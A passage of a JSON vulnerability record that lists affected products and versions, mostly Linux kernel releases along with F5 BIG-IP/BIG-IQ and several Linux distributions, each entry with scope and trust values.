        "version": "11.1.0"
      },
      {
        "model": "big-ip protocol security module",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-iq device",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.5.0"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-iq security",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.5.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "10.04"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "linux",
        "version": "3.13.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.13.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.10.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.12.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.12.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.13.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.13.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.12"
      },
      {
        "model": "kernel 2.6.33-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.39"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "linux enterprise server unsupported extras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.6"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.47"
      },
      {
        "model": "kernel 2.6.36-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "hat enterprise linux server optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.22"
      },
      {
        "model": "kernel 2.6.35-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.8"
      },
      {
        "model": "hat enterprise linux workstation optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.13"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.2"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.25"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.6"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.2"
      },
      {
        "model": "kernel 2.6.36-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.28-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.53"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.2"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "hat enterprise linux hpc node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.4"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.10"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.35"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "hat enterprise linux hpc node optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "6"
      },
      {
        "model": "kernel 2.6.36-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.3"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel 2.6.28-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3113"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "kernel 2.6.35-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20-2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "kernel 2.6.36-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.13"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "kernel rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.4"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.8"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.5"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.6"
      },
      {
        "model": "opensuse factory",
        "scope": null,
        "trust": 0.3,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "hat enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.17"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.18"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.39"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.214"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.1"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.11"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.1"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.22"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.7"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
